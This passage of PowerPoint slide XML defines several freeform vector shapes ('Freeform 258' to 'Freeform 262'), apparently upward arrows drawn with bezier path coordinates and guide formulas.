                  <a:gd name="T27" fmla="*/ 727 h 1029"/>
                  <a:gd name="T28" fmla="*/ 597 w 810"/>
                  <a:gd name="T29" fmla="*/ 724 h 1029"/>
                  <a:gd name="T30" fmla="*/ 734 w 810"/>
                  <a:gd name="T31" fmla="*/ 586 h 1029"/>
                  <a:gd name="T32" fmla="*/ 734 w 810"/>
                  <a:gd name="T33" fmla="*/ 150 h 1029"/>
                  <a:gd name="T34" fmla="*/ 774 w 810"/>
                  <a:gd name="T35" fmla="*/ 150 h 1029"/>
                  <a:gd name="T36" fmla="*/ 793 w 810"/>
                  <a:gd name="T37" fmla="*/ 103 h 10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10" h="1029">
                    <a:moveTo>
                      <a:pt x="793" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="700" y="10"/>
                      <a:pt x="700" y="10"/>
                      <a:pt x="700" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="690" y="0"/>
                      <a:pt x="672" y="0"/>
                      <a:pt x="662" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="569" y="103"/>
                      <a:pt x="569" y="103"/>
                      <a:pt x="569" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="120"/>
                      <a:pt x="564" y="150"/>
                      <a:pt x="588" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="150"/>
                      <a:pt x="628" y="150"/>
                      <a:pt x="628" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="586"/>
                      <a:pt x="628" y="586"/>
                      <a:pt x="628" y="586"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="603"/>
                      <a:pt x="614" y="617"/>
                      <a:pt x="596" y="618"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="621"/>
                      <a:pt x="137" y="621"/>
                      <a:pt x="137" y="621"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="621"/>
                      <a:pt x="0" y="683"/>
                      <a:pt x="0" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1029"/>
                      <a:pt x="0" y="1029"/>
                      <a:pt x="0" y="1029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="1029"/>
                      <a:pt x="106" y="1029"/>
                      <a:pt x="106" y="1029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="759"/>
                      <a:pt x="106" y="759"/>
                      <a:pt x="106" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="742"/>
                      <a:pt x="121" y="727"/>
                      <a:pt x="138" y="727"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="597" y="724"/>
                      <a:pt x="597" y="724"/>
                      <a:pt x="597" y="724"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="673" y="724"/>
                      <a:pt x="734" y="662"/>
                      <a:pt x="734" y="586"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="734" y="150"/>
                      <a:pt x="734" y="150"/>
                      <a:pt x="734" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="774" y="150"/>
                      <a:pt x="774" y="150"/>
                      <a:pt x="774" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="798" y="150"/>
                      <a:pt x="810" y="120"/>
                      <a:pt x="793" y="10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" name="Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6478625" y="4075118"/>
                <a:ext cx="1173169" cy="2771778"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 602 w 619"/>
                  <a:gd name="T1" fmla="*/ 103 h 1463"/>
                  <a:gd name="T2" fmla="*/ 510 w 619"/>
                  <a:gd name="T3" fmla="*/ 10 h 1463"/>
                  <a:gd name="T4" fmla="*/ 471 w 619"/>
                  <a:gd name="T5" fmla="*/ 10 h 1463"/>
                  <a:gd name="T6" fmla="*/ 378 w 619"/>
                  <a:gd name="T7" fmla="*/ 103 h 1463"/>
                  <a:gd name="T8" fmla="*/ 398 w 619"/>
                  <a:gd name="T9" fmla="*/ 150 h 1463"/>
                  <a:gd name="T10" fmla="*/ 437 w 619"/>
                  <a:gd name="T11" fmla="*/ 150 h 1463"/>
                  <a:gd name="T12" fmla="*/ 437 w 619"/>
                  <a:gd name="T13" fmla="*/ 706 h 1463"/>
                  <a:gd name="T14" fmla="*/ 405 w 619"/>
                  <a:gd name="T15" fmla="*/ 738 h 1463"/>
                  <a:gd name="T16" fmla="*/ 137 w 619"/>
                  <a:gd name="T17" fmla="*/ 741 h 1463"/>
                  <a:gd name="T18" fmla="*/ 0 w 619"/>
                  <a:gd name="T19" fmla="*/ 879 h 1463"/>
                  <a:gd name="T20" fmla="*/ 0 w 619"/>
                  <a:gd name="T21" fmla="*/ 1463 h 1463"/>
                  <a:gd name="T22" fmla="*/ 106 w 619"/>
                  <a:gd name="T23" fmla="*/ 1463 h 1463"/>
                  <a:gd name="T24" fmla="*/ 106 w 619"/>
                  <a:gd name="T25" fmla="*/ 879 h 1463"/>
                  <a:gd name="T26" fmla="*/ 138 w 619"/>
                  <a:gd name="T27" fmla="*/ 847 h 1463"/>
                  <a:gd name="T28" fmla="*/ 406 w 619"/>
                  <a:gd name="T29" fmla="*/ 845 h 1463"/>
                  <a:gd name="T30" fmla="*/ 543 w 619"/>
                  <a:gd name="T31" fmla="*/ 706 h 1463"/>
                  <a:gd name="T32" fmla="*/ 543 w 619"/>
                  <a:gd name="T33" fmla="*/ 150 h 1463"/>
                  <a:gd name="T34" fmla="*/ 583 w 619"/>
                  <a:gd name="T35" fmla="*/ 150 h 1463"/>
                  <a:gd name="T36" fmla="*/ 602 w 619"/>
                  <a:gd name="T37" fmla="*/ 103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19" h="1463">
                    <a:moveTo>
                      <a:pt x="602" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="510" y="10"/>
                      <a:pt x="510" y="10"/>
                      <a:pt x="510" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="499" y="0"/>
                      <a:pt x="482" y="0"/>
                      <a:pt x="471" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="378" y="103"/>
                      <a:pt x="378" y="103"/>
                      <a:pt x="378" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="361" y="120"/>
                      <a:pt x="373" y="150"/>
                      <a:pt x="398" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="150"/>
                      <a:pt x="437" y="150"/>
                      <a:pt x="437" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="706"/>
                      <a:pt x="437" y="706"/>
                      <a:pt x="437" y="706"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="724"/>
                      <a:pt x="423" y="738"/>
                      <a:pt x="405" y="738"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="741"/>
                      <a:pt x="137" y="741"/>
                      <a:pt x="137" y="741"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="741"/>
                      <a:pt x="0" y="804"/>
                      <a:pt x="0" y="879"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1463"/>
                      <a:pt x="0" y="1463"/>
                      <a:pt x="0" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="1463"/>
                      <a:pt x="106" y="1463"/>
                      <a:pt x="106" y="1463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="879"/>
                      <a:pt x="106" y="879"/>
                      <a:pt x="106" y="879"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="862"/>
                      <a:pt x="120" y="847"/>
                      <a:pt x="138" y="847"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="406" y="845"/>
                      <a:pt x="406" y="845"/>
                      <a:pt x="406" y="845"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="482" y="844"/>
                      <a:pt x="543" y="782"/>
                      <a:pt x="543" y="706"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="543" y="150"/>
                      <a:pt x="543" y="150"/>
                      <a:pt x="543" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="583" y="150"/>
                      <a:pt x="583" y="150"/>
                      <a:pt x="583" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="607" y="150"/>
                      <a:pt x="619" y="120"/>
                      <a:pt x="602" y="10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" name="Freeform 259"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6219861" y="3441704"/>
                <a:ext cx="782642" cy="3405191"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 395 w 413"/>
                  <a:gd name="T1" fmla="*/ 104 h 1797"/>
                  <a:gd name="T2" fmla="*/ 303 w 413"/>
                  <a:gd name="T3" fmla="*/ 11 h 1797"/>
                  <a:gd name="T4" fmla="*/ 264 w 413"/>
                  <a:gd name="T5" fmla="*/ 11 h 1797"/>
                  <a:gd name="T6" fmla="*/ 172 w 413"/>
                  <a:gd name="T7" fmla="*/ 104 h 1797"/>
                  <a:gd name="T8" fmla="*/ 191 w 413"/>
                  <a:gd name="T9" fmla="*/ 150 h 1797"/>
                  <a:gd name="T10" fmla="*/ 230 w 413"/>
                  <a:gd name="T11" fmla="*/ 150 h 1797"/>
                  <a:gd name="T12" fmla="*/ 230 w 413"/>
                  <a:gd name="T13" fmla="*/ 720 h 1797"/>
                  <a:gd name="T14" fmla="*/ 199 w 413"/>
                  <a:gd name="T15" fmla="*/ 752 h 1797"/>
                  <a:gd name="T16" fmla="*/ 137 w 413"/>
                  <a:gd name="T17" fmla="*/ 752 h 1797"/>
                  <a:gd name="T18" fmla="*/ 0 w 413"/>
                  <a:gd name="T19" fmla="*/ 891 h 1797"/>
                  <a:gd name="T20" fmla="*/ 0 w 413"/>
                  <a:gd name="T21" fmla="*/ 1797 h 1797"/>
                  <a:gd name="T22" fmla="*/ 107 w 413"/>
                  <a:gd name="T23" fmla="*/ 1797 h 1797"/>
                  <a:gd name="T24" fmla="*/ 107 w 413"/>
                  <a:gd name="T25" fmla="*/ 891 h 1797"/>
                  <a:gd name="T26" fmla="*/ 138 w 413"/>
                  <a:gd name="T27" fmla="*/ 859 h 1797"/>
                  <a:gd name="T28" fmla="*/ 200 w 413"/>
                  <a:gd name="T29" fmla="*/ 858 h 1797"/>
                  <a:gd name="T30" fmla="*/ 337 w 413"/>
                  <a:gd name="T31" fmla="*/ 720 h 1797"/>
                  <a:gd name="T32" fmla="*/ 337 w 413"/>
                  <a:gd name="T33" fmla="*/ 150 h 1797"/>
                  <a:gd name="T34" fmla="*/ 376 w 413"/>
                  <a:gd name="T35" fmla="*/ 150 h 1797"/>
                  <a:gd name="T36" fmla="*/ 395 w 413"/>
                  <a:gd name="T37" fmla="*/ 104 h 17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3" h="1797">
                    <a:moveTo>
                      <a:pt x="395" y="104"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="11"/>
                      <a:pt x="303" y="11"/>
                      <a:pt x="303" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="292" y="0"/>
                      <a:pt x="275" y="0"/>
                      <a:pt x="264" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="104"/>
                      <a:pt x="172" y="104"/>
                      <a:pt x="172" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="121"/>
                      <a:pt x="167" y="150"/>
                      <a:pt x="191" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="150"/>
                      <a:pt x="230" y="150"/>
                      <a:pt x="230" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="720"/>
                      <a:pt x="230" y="720"/>
                      <a:pt x="230" y="720"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="737"/>
                      <a:pt x="216" y="752"/>
                      <a:pt x="199" y="752"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="752"/>
                      <a:pt x="137" y="752"/>
                      <a:pt x="137" y="752"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="753"/>
                      <a:pt x="0" y="815"/>
                      <a:pt x="0" y="891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1797"/>
                      <a:pt x="0" y="1797"/>
                      <a:pt x="0" y="1797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="1797"/>
                      <a:pt x="107" y="1797"/>
                      <a:pt x="107" y="1797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="891"/>
                      <a:pt x="107" y="891"/>
                      <a:pt x="107" y="891"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="873"/>
                      <a:pt x="121" y="859"/>
                      <a:pt x="138" y="859"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="200" y="858"/>
                      <a:pt x="200" y="858"/>
                      <a:pt x="200" y="858"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="858"/>
                      <a:pt x="337" y="796"/>
                      <a:pt x="337" y="720"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="337" y="150"/>
                      <a:pt x="337" y="150"/>
                      <a:pt x="337" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="376" y="150"/>
                      <a:pt x="376" y="150"/>
                      <a:pt x="376" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401" y="150"/>
                      <a:pt x="413" y="121"/>
                      <a:pt x="395" y="10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" name="Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6310349" y="3703642"/>
                <a:ext cx="485778" cy="3154366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 256 w 256"/>
                  <a:gd name="T1" fmla="*/ 21 h 1665"/>
                  <a:gd name="T2" fmla="*/ 236 w 256"/>
                  <a:gd name="T3" fmla="*/ 0 h 1665"/>
                  <a:gd name="T4" fmla="*/ 215 w 256"/>
                  <a:gd name="T5" fmla="*/ 21 h 1665"/>
                  <a:gd name="T6" fmla="*/ 215 w 256"/>
                  <a:gd name="T7" fmla="*/ 38 h 1665"/>
                  <a:gd name="T8" fmla="*/ 230 w 256"/>
                  <a:gd name="T9" fmla="*/ 23 h 1665"/>
                  <a:gd name="T10" fmla="*/ 230 w 256"/>
                  <a:gd name="T11" fmla="*/ 582 h 1665"/>
                  <a:gd name="T12" fmla="*/ 151 w 256"/>
                  <a:gd name="T13" fmla="*/ 661 h 1665"/>
                  <a:gd name="T14" fmla="*/ 90 w 256"/>
                  <a:gd name="T15" fmla="*/ 662 h 1665"/>
                  <a:gd name="T16" fmla="*/ 0 w 256"/>
                  <a:gd name="T17" fmla="*/ 753 h 1665"/>
                  <a:gd name="T18" fmla="*/ 0 w 256"/>
                  <a:gd name="T19" fmla="*/ 1659 h 1665"/>
                  <a:gd name="T20" fmla="*/ 6 w 256"/>
                  <a:gd name="T21" fmla="*/ 1665 h 1665"/>
                  <a:gd name="T22" fmla="*/ 12 w 256"/>
                  <a:gd name="T23" fmla="*/ 1659 h 1665"/>
                  <a:gd name="T24" fmla="*/ 12 w 256"/>
                  <a:gd name="T25" fmla="*/ 753 h 1665"/>
                  <a:gd name="T26" fmla="*/ 90 w 256"/>
                  <a:gd name="T27" fmla="*/ 674 h 1665"/>
                  <a:gd name="T28" fmla="*/ 151 w 256"/>
                  <a:gd name="T29" fmla="*/ 673 h 1665"/>
                  <a:gd name="T30" fmla="*/ 242 w 256"/>
                  <a:gd name="T31" fmla="*/ 582 h 1665"/>
                  <a:gd name="T32" fmla="*/ 242 w 256"/>
                  <a:gd name="T33" fmla="*/ 23 h 1665"/>
                  <a:gd name="T34" fmla="*/ 256 w 256"/>
                  <a:gd name="T35" fmla="*/ 38 h 1665"/>
                  <a:gd name="T36" fmla="*/ 256 w 256"/>
                  <a:gd name="T37" fmla="*/ 21 h 1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6" h="1665">
                    <a:moveTo>
                      <a:pt x="256" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="0"/>
                      <a:pt x="236" y="0"/>
                      <a:pt x="236" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="21"/>
                      <a:pt x="215" y="21"/>
                      <a:pt x="215" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="38"/>
                      <a:pt x="215" y="38"/>
                      <a:pt x="215" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="23"/>
                      <a:pt x="230" y="23"/>
                      <a:pt x="230" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="582"/>
                      <a:pt x="230" y="582"/>
                      <a:pt x="230" y="582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="625"/>
                      <a:pt x="194" y="661"/>
                      <a:pt x="151" y="661"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="662"/>
                      <a:pt x="90" y="662"/>
                      <a:pt x="90" y="662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="662"/>
                      <a:pt x="0" y="703"/>
                      <a:pt x="0" y="753"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1659"/>
                      <a:pt x="0" y="1659"/>
                      <a:pt x="0" y="1659"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1662"/>
                      <a:pt x="2" y="1665"/>
                      <a:pt x="6" y="1665"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1665"/>
                      <a:pt x="12" y="1662"/>
                      <a:pt x="12" y="1659"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="753"/>
                      <a:pt x="12" y="753"/>
                      <a:pt x="12" y="753"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="710"/>
                      <a:pt x="47" y="674"/>
                      <a:pt x="90" y="674"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="673"/>
                      <a:pt x="151" y="673"/>
                      <a:pt x="151" y="673"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="673"/>
                      <a:pt x="242" y="632"/>
                      <a:pt x="242" y="582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="23"/>
                      <a:pt x="242" y="23"/>
                      <a:pt x="242" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="38"/>
                      <a:pt x="256" y="38"/>
                      <a:pt x="256" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="256" y="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" name="Freeform 261"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6567525" y="4333880"/>
                <a:ext cx="879480" cy="2524128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 464 w 464"/>
                  <a:gd name="T1" fmla="*/ 21 h 1332"/>
                  <a:gd name="T2" fmla="*/ 443 w 464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1332"/>
                  <a:gd name="T4" fmla="*/ 423 w 464"/>
                  <a:gd name="T5" fmla="*/ 21 h 1332"/>
                  <a:gd name="T6" fmla="*/ 423 w 464"/>
                  <a:gd name="T7" fmla="*/ 38 h 1332"/>
                  <a:gd name="T8" fmla="*/ 437 w 464"/>
                  <a:gd name="T9" fmla="*/ 24 h 1332"/>
                  <a:gd name="T10" fmla="*/ 437 w 464"/>
                  <a:gd name="T11" fmla="*/ 569 h 1332"/>
                  <a:gd name="T12" fmla="*/ 359 w 464"/>
                  <a:gd name="T13" fmla="*/ 648 h 1332"/>
                  <a:gd name="T14" fmla="*/ 90 w 464"/>
                  <a:gd name="T15" fmla="*/ 651 h 1332"/>
                  <a:gd name="T16" fmla="*/ 0 w 464"/>
                  <a:gd name="T17" fmla="*/ 742 h 1332"/>
                  <a:gd name="T18" fmla="*/ 0 w 464"/>
                  <a:gd name="T19" fmla="*/ 1326 h 1332"/>
                  <a:gd name="T20" fmla="*/ 6 w 464"/>
                  <a:gd name="T21" fmla="*/ 1332 h 1332"/>
                  <a:gd name="T22" fmla="*/ 12 w 464"/>
                  <a:gd name="T23" fmla="*/ 1326 h 1332"/>
                  <a:gd name="T24" fmla="*/ 12 w 464"/>
                  <a:gd name="T25" fmla="*/ 742 h 1332"/>
                  <a:gd name="T26" fmla="*/ 90 w 464"/>
                  <a:gd name="T27" fmla="*/ 663 h 1332"/>
                  <a:gd name="T28" fmla="*/ 359 w 464"/>
                  <a:gd name="T29" fmla="*/ 660 h 1332"/>
                  <a:gd name="T30" fmla="*/ 449 w 464"/>
                  <a:gd name="T31" fmla="*/ 569 h 1332"/>
                  <a:gd name="T32" fmla="*/ 449 w 464"/>
                  <a:gd name="T33" fmla="*/ 24 h 1332"/>
                  <a:gd name="T34" fmla="*/ 464 w 464"/>
                  <a:gd name="T35" fmla="*/ 38 h 1332"/>
                  <a:gd name="T36" fmla="*/ 464 w 464"/>
                  <a:gd name="T37" fmla="*/ 21 h 1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64" h="1332">
                    <a:moveTo>
                      <a:pt x="464" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="443" y="0"/>
                      <a:pt x="443" y="0"/>
                      <a:pt x="443" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="423" y="21"/>
                      <a:pt x="423" y="21"/>
                      <a:pt x="423" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="423" y="38"/>
                      <a:pt x="423" y="38"/>
                      <a:pt x="423" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="24"/>
                      <a:pt x="437" y="24"/>
                      <a:pt x="437" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="569"/>
                      <a:pt x="437" y="569"/>
                      <a:pt x="437" y="569"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="612"/>
                      <a:pt x="402" y="648"/>
                      <a:pt x="359" y="648"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="651"/>
                      <a:pt x="90" y="651"/>
                      <a:pt x="90" y="651"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="651"/>
                      <a:pt x="0" y="692"/>
                      <a:pt x="0" y="742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1326"/>
                      <a:pt x="0" y="1326"/>
                      <a:pt x="0" y="1326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1329"/>
                      <a:pt x="3" y="1332"/>
                      <a:pt x="6" y="1332"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="1332"/>
                      <a:pt x="12" y="1329"/>
                      <a:pt x="12" y="1326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="742"/>
                      <a:pt x="12" y="742"/>
                      <a:pt x="12" y="742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="699"/>
                      <a:pt x="47" y="663"/>
                      <a:pt x="90" y="663"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="359" y="660"/>
                      <a:pt x="359" y="660"/>
                      <a:pt x="359" y="660"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="660"/>
                      <a:pt x="449" y="619"/>
                      <a:pt x="449" y="569"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="449" y="24"/>
                      <a:pt x="449" y="24"/>
                      <a:pt x="449" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="464" y="38"/>
                      <a:pt x="464" y="38"/>
                      <a:pt x="464" y="38"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="464" y="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" name="Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3844948" y="4897443"/>
                <a:ext cx="1535121" cy="1949452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 673 w 810"/>
                  <a:gd name="T1" fmla="*/ 621 h 1029"/>
                  <a:gd name="T2" fmla="*/ 214 w 810"/>
                  <a:gd name="T3" fmla="*/ 618 h 1029"/>
                  <a:gd name="T4" fmla="*/ 182 w 810"/>
                  <a:gd name="T5" fmla="*/ 586 h 1029"/>
                  <a:gd name="T6" fmla="*/ 182 w 810"/>
                  <a:gd name="T7" fmla="*/ 150 h 1029"/>
                  <a:gd name="T8" fmla="*/ 221 w 810"/>
                  <a:gd name="T9" fmla="*/ 150 h 1029"/>
                  <a:gd name="T10" fmla="*/ 241 w 810"/>
                  <a:gd name="T11" fmla="*/ 103 h 1029"/>
                  <a:gd name="T12" fmla="*/ 148 w 810"/>
                  <a:gd name="T13" fmla="*/ 10 h 1029"/>
                  <a:gd name="T14" fmla="*/ 109 w 810"/>
                  <a:gd name="T15" fmla="*/ 10 h 1029"/>
                  <a:gd name="T16" fmla="*/ 17 w 810"/>
                  <a:gd name="T17" fmla="*/ 103 h 1029"/>
                  <a:gd name="T18" fmla="*/ 36 w 810"/>
                  <a:gd name="T19" fmla="*/ 150 h 1029"/>
                  <a:gd name="T20" fmla="*/ 76 w 810"/>
                  <a:gd name="T21" fmla="*/ 150 h 1029"/>
                  <a:gd name="T22" fmla="*/ 76 w 810"/>
                  <a:gd name="T23" fmla="*/ 586 h 1029"/>
                  <a:gd name="T24" fmla="*/ 213 w 810"/>
                  <a:gd name="T25" fmla="*/ 724 h 1029"/>
                  <a:gd name="T26" fmla="*/ 672 w 810"/>
                  <a:gd name="T27" fmla="*/ 727 h 1029"/>
                  <a:gd name="T28" fmla="*/ 703 w 810"/>
                  <a:gd name="T29" fmla="*/ 759 h 1029"/>
                  <a:gd name="T30" fmla="*/ 703 w 810"/>
                  <a:gd name="T31" fmla="*/ 1029 h 1029"/>
                  <a:gd name="T32" fmla="*/ 810 w 810"/>
                  <a:gd name="T33" fmla="*/ 1029 h 1029"/>
                  <a:gd name="T34" fmla="*/ 810 w 810"/>
                  <a:gd name="T35" fmla="*/ 759 h 1029"/>
                  <a:gd name="T36" fmla="*/ 673 w 810"/>
                  <a:gd name="T37" fmla="*/ 621 h 10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10" h="1029">
                    <a:moveTo>
                      <a:pt x="673" y="621"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="618"/>
                      <a:pt x="214" y="618"/>
                      <a:pt x="214" y="618"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="617"/>
                      <a:pt x="182" y="603"/>
                      <a:pt x="182" y="586"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="182" y="150"/>
                      <a:pt x="182" y="150"/>
                      <a:pt x="182" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="150"/>
                      <a:pt x="221" y="150"/>
                      <a:pt x="221" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="246" y="150"/>
                      <a:pt x="258" y="120"/>
                      <a:pt x="241" y="103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38" y="0"/>
                      <a:pt x="120" y="0"/>
                      <a:pt x="109" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="103"/>
                      <a:pt x="17" y="103"/>
                      <a:pt x="17" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="120"/>
                      <a:pt x="12" y="150"/>
                      <a:pt x="36" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
